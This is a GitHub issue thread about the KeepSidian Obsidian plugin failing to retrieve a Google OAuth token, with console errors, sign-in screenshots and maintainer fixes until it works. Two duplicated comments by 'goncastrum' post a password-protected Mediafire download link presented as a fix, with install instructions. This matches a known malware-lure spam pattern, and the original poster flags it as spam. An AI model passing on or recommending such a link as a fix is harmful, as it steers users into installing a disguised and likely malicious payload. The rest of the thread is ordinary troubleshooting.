### ISSUE TITLE
Cannot retrieve token

### ISSUE THREAD

**Issue by ms3056** [lc0rp/KeepSidian#1]
I am getting this error in the console when I try to retrieve my token. 

```bash
<html>
<body>
<!--StartFragment--><div aria-expanded="true" tabindex="-1" style="box-sizing: border-box; min-width: 0px; min-height: 0px; outline-width: 0px; flex: 0 0 auto; color: rgb(227, 227, 227); font-family: monospace; font-size: 12px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(78, 53, 52); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><span class="source-code" style="box-sizing: border-box; min-width: 0px; min-height: 0px; font-family: var(--source-code-font-family); white-space: pre-wrap; font-size: var(--source-code-font-size) !important; line-height: 1.2;"><span class="console-message-anchor" style="box-sizing: border-box; min-width: 0px; min-height: 0px; float: right; text-align: right; max-width: 100%; margin-left: 4px;"><button class="devtools-link text-button link-style invalid-link" tabindex="-1" title="app://obsidian.md/plugin:keepsidian:157378" style="box-sizing: border-box; min-width: 0px; min-height: 0px; font: inherit; margin: 0px; height: unset; border: none; border-radius: 2px; padding: 0px !important; color: var(--text-disabled); background: none; flex: 0 0 auto; white-space: nowrap; text-decoration: none; outline-offset: 2px; outline: none; cursor: pointer;"><br class="Apple-interchange-newline">plugin:keepsidian:157378</button> </span><span class="console-message-text" style="box-sizing: border-box; min-width: 0px; min-height: 0px; color: var(--override-error-text-color) !important;"><span class="object-value-error source-code" style="box-sizing: border-box; min-width: 0px; min-height: 0px; font-family: var(--source-code-font-family); white-space: pre-wrap; font-size: var(--source-code-font-size) !important; line-height: 1.2;">Executable doesn't exist at C:\Users\m3n7qv\AppData\Local\ms-playwright\chromium-1124\chrome-win\chrome.exe
╔═════════════════════════════════════════════════════════════════════════╗
║ Looks like Playwright Test or Playwright was just installed or updated. ║
║ Please run the following command to download new browsers:              ║
║                                                                         ║
║     npx playwright install                                              ║
║                                                                         ║
║ &lt;3 Playwright Team                                                      ║
╚═════════════════════════════════════════════════════════════════════════╝
    at captureRawStack (C:\Users\username\AppData\Local\Obsidian\plugin:keepsidian:112733:21)
    at captureLibraryStackTrace (C:\Users\username\AppData\Local\Obsidian\plugin:keepsidian:112739:21)
    at BrowserType._wrapApiCall (C:\Users\username\AppData\Local\Obsidian\plugin:keepsidian:149701:69)
    at BrowserType.launch (C:\Users\username\AppData\Local\Obsidian\plugin:keepsidian:155112:27)
    at eval (C:\Users\username\AppData\Local\Obsidian\plugin:keepsidian:157411:42)
    at eval (C:\Users\username\AppData\Local\Obsidian\plugin:keepsidian:157456:9)
    at KeepToObsidianPlugin.getOAuthToken (C:\Users\username\AppData\Local\Obsidian\plugin:keepsidian:157408:12)
    at async KeepToObsidianPlugin.retrieveToken (C:\Users\username\AppData\Local\Obsidian\plugin:keepsidian:157361:26)
    at async eval (C:\Users\username\AppData\Local\Obsidian\plugin:keepsidian:157482:7)</span></span></span></div><div class="" role="group" style="box-sizing: border-box; min-width: 0px; min-height: 0px; flex: 0 0 auto; color: rgb(227, 227, 227); font-family: monospace; font-size: 12px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; white-space: normal; background-color: rgb(78, 53, 52); text-decoration-thickness: initial; text-decoration-style: initial; text-decoration-color: initial;"><span class="monospace stack-preview-container width-constrained" style="display: inline-block; --monospace-font-size: 12px; --monospace-font-family: monospace; --source-code-font-size: 12px; --source-code-font-family: monospace; width: 550px; box-sizing: border-box; min-width: 0px; min-height: 0px; font-family: var(--monospace-font-family); font-size: var(--monospace-font-size) !important;">
  | retrieveToken | @ | plugin:keepsidian:157378
-- | -- | -- | --


</span></div><!--EndFragment-->
</body>
</html>
```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ms3056** [comment]
I believe this is spam - please remove those two links - I have seen the same comments in other projects where issues are posted.

**Comment by lc0rp** [comment]
What two links?

Regarding the original issue, please clarify the following so I can try to reproduce the issue and respond
1. What OS are you using?
2. What browser do you usually use?

Thanks

**Comment by lc0rp** [comment]
Checking in again. 

I guess you saw some links on your end that you ultimately deleted? I only see your original question and your commend about spam.

Were you able to retrieve the token?

**Comment by cashea** [comment]
Cannot retrieve token.

Chrome opens.
Opens a "Could not sign you in page"
> "This browser or app may not be secure.  Try using a different browser. If you're already using a supported browser, you can try again to sign in."

**Comment by ms3056** [comment]
Hi - the reference to the two links was two spam links in this thread - it seems GitHub removed them - not related to your plugin. 

I tried again, and after clicking the Retrieve button I waited a while and it them Microsoft Explorer opened, even though Chrome is my default. 

I copied the link over, and opened it in Chrome, and this happens forever after I enter my credentials:

![image](https://github.com/user-attachments/assets/85125216-5f73-4dad-9f07-2f3793bdd648)

**Comment by ms3056** [comment]
It opens a Chromium browser and this is what I see:

![image](https://github.com/user-attachments/assets/f82bdccb-34ea-417a-a9ab-12bf49f95a9b)

**Comment by stark1tty** [comment]
I am also having the insecure browser issue and can not retrieve the token, we also cannot manually put in an API token which is a bit of a pain. I am using Firefox as default browser on Linux (Ubuntu 24). However, when I click on the get tokem button it forces ungoogled chromium to pop up. I also tried to set Chrome briefly as default and it ignored that.

**Comment by lc0rp** [comment]
> we also cannot manually put in an API token which is a bit of a pain

@stark1tty, good point - it'll be manually editable in the next update.

**Comment by lc0rp** [comment]
@ms3056 and @cashea, I'm working on a fix. Apologies for the silence; it's been a busy couple of weeks!

**Comment by lc0rp** [comment]
@cashea, @ms3056, @stark1tty - Upgrade the plugin, give the latest release a try and let me know if it fixes this issue.

**Comment by ms3056** [comment]
This didn't work for me. I pasted the token and it didn't accept it. It also triggered a Windows popup dialog asking me for my credentials for Google. I am not sure what is happening, but yeah, this didn't work form me. Maybe it is because my laptop is a corporate machine and is locked down.

**Comment by ms3056** [comment]
I created a passkey, and the popup from windows cam up - and I successfully entered my passkey on the iphone. 

![image](https://github.com/user-attachments/assets/ee9f4da7-f398-46b0-86a1-d06609a9a26d)

![image](https://github.com/user-attachments/assets/0855dc91-9f6d-4775-9df6-247f00b847bb)

**Comment by ms3056** [comment]
As soon as I paste the oath token the screen closes and i am looking at the KeepSidian settings page. no error or success message. then I try to import my notes, and the failure message occurs. 

each passkey even is successful. I verified I am getting the oath token correctly - but the paste even closes the dialog - do i need to type it out?

**Comment by ms3056** [comment]
I've run through the process several times, and I ended up having to manually put the token in - but I am still getting "Failed import" popup. 

![image](https://github.com/user-attachments/assets/97b5e743-014c-41aa-baad-e1726f589bd9)

**Comment by lc0rp** [comment]
> I'll send a note once the fix is in. @ms3056

@ms3056 - I just published v 1.0.10. Please give it a whirl. Note that the sync functionality is quite rudimentary in v 1.0.x. I'm aiming for an improved sync algorithm in the next version. I'm also on the Obsidian discord server as @lc0rp.

**Comment by ms3056** [comment]
I got it to work! Thanks!
